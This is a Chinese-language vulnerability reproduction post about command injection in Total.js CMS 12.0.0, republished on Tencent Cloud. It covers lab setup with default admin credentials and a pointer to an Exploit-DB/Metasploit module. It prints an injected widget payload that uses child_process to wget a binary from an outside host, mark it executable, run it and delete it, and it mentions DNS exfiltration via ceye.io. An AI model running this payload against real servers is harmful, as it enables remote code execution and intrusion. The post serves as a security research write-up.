首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Total.js CMS 命令注入漏洞复现

Total.js CMS 命令注入漏洞复现

作者头像
墙角睡大觉
发布2019-12-16 16:15:47
1.6K0
发布2019-12-16 16:15:47
举报

0X01 漏洞概述

Total.js CMS是一套基于NoSQL数据库的内容管理系统(CMS)。

Total.js CMS 12.0.0版本中存在命令注入漏洞,攻击者可利用该漏洞执行非法命令。

0X02环境搭建

方法一:下载源码

https://my.totaljs.com/
或者
https://github.com/totaljs/cms

Windows下安装npm

参考:https://blog.csdn.net/zhao1949/article/details/53907827

到下载的Total.js CMS 12目录下

npm install

nodedebug.js

访问:http://127.0.0.1:8000/
http://127.0.0.1:8000/admin/

默认账号密码:admin/admin

注意图标

0x03 漏洞利用

下载利用脚本

https://www.exploit-db.com/exploits/47531

添加到msf中,访问

http://192.168.0.169:8000/admin/widgets/

这是植入的代码

<scripttotal>global.process.mainModule.require('child_process').exec("sleep2;wget -qO /tmp/XrwHzcVK http://192.168.92.145:8080/p_BYrIw;chmod +x /tmp/XrwHzcVK;/tmp/XrwHzcVK;rm-f /tmp/XrwHzcVK");</script>

远程下载赋权执行然后删除。

由于此处是windows系统,执行命令没有回显

保存 去目录下发现了2.txt文件

可以结合DNS将数据外带出去。

此处使用ceye.io

0x04修复建议

打补丁。

投稿邮箱:cvebug@163.com

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-12-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全漏洞环境学习 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0X01 漏洞概述
  • 0X02环境搭建
  • 0x03 漏洞利用
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档